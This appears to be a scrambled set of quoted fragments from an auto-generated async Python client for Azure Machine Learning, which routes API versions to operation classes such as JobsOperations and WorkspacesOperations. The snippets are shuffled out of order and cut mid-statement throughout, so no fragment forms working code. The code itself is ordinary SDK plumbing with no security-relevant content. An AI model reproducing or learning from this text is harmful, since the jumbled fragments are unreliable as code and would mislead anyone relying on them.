models(self): \"\"\"Instance depends on the", "= self._get_api_version('get_operation_status') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else:", "return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif", ":class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version 
==", "not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self):", "..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version))", "{} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends", "__init__(self, *args, **kwargs): \"\"\"This is a fake class to support current implemetation of", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else:", "{} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "= self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client,", "api_version = self._get_api_version('private_link_resources') if api_version == 
'2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass", "operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API version: *", "'v1.0': from ..registry_discovery import models return models elif api_version == 'v1.0': from ..runhistory", "not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self):", "'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions':", "EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass", "def workspace_features(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview:", "from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from", "raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config,", 
":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version =", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01':", "import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as", "api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version", ":class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ModelsOperations", "models elif api_version == '2021-10-01': from ..v2021_10_01 import models return models elif api_version", "on the API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version", "group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): 
\"\"\"Instance depends on", "OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version", "* 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions')", "spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version =", "'1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does", "{} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01':", "China, etc.). By default, it uses the latest API version available on public", "# # Code generated by Microsoft (R) AutoRest Code Generator. 
# Changes may", "from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models return models elif api_version == '2022-02-01-preview':", ":class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations", "Azure Government, Azure China, etc.). By default, it uses the latest API version", "depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01:", "version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version =", "* 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "depends on the API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: 
:class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01:", "Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>`", ":class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations", "2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client,", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version:", "does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API version: *", "API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version = self._get_api_version('data_container') if api_version == '1.5.0':", "DeleteOperations as 
OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations import DeleteOperations as OperationClass", "have operation group 'component_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance", "from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not", "not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self):", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from", "from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version", "depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01:", "if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API", "\"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from 
..runhistory.aio.operations import RunOperations as", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API", "2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from", "'2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "import QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "have operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance", "-> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs) self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces,", "1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: 
:mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>` * 2021-10-01:", "def get_operation_status(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version", "version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version =", "usages(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>`", "jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>`", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the API version: *", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else:", "not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self):", "== 
'2022-05-01': from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {}", "== '2021-10-01': from ..v2021_10_01.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>`", "ID of the target subscription. :type subscription_id: str :param api_version: API version to", "..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version))", "group 'environment_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetsV1Operations as OperationClass else: raise ValueError(\"API version", "from ..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import", "ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "== '2022-05-01': from ..v2022_05_01.aio.operations import CodeContainersOperations as OperationClass 
else: raise ValueError(\"API version {}", "@property def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\"", "'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the", "* 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version ==", "to support current implemetation of MultiApiClientMixin.\" Will be removed in final version of", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version ==", "api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version", "== '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from", ":class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations", "..v2022_01_01_preview.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations", "..v2021_10_01.aio.operations import JobsOperations as 
OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations", ":type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_containers(self): \"\"\"Instance depends on the API version: *", "def events(self): \"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version", ":class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\" api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations", "import WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as", "self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise", "import CodeContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "(R) AutoRest Code Generator. 
# Changes may cause incorrect behavior and will be", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif", "else: raise ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client,", "depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01:", "QuotasOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise", "'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations as OperationClass else: raise ValueError(\"API", "api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version", "2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if api_version == 
'2021-10-01':", "Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>`", "group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-05-01': from", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends on the API version: *", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version =", "on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration') if api_version", "Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the 
API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>`", "..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>`", "API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview':", "== '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass else: raise ValueError(\"API version {}", "the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version = self._get_api_version('datasets_v1') if api_version ==", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_versions'\".format(api_version)) return", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: *", "API version: * 2021-10-01: 
:class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01:", "'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the", "polls for LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION =", "def spans(self): \"\"\"Instance depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version", "models elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version ==", "* 2022-05-01: :class:`DataContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataContainersOperations>` \"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "raise ValueError(\"API version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config,", "\"\"\"Instance depends on the API version: * 2021-10-01: 
:class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` *", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends on the API version:", "else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client,", "LRO operations if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG", "..v2021_10_01 import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models", "API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01:", "PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config,", "2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: 
:class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version", "from ..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not", "@property def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\"", "\"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as", ":mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import models", "import CodeVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as", "'1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {} does", "= self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif", "== '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {}", "not described in the profile. 
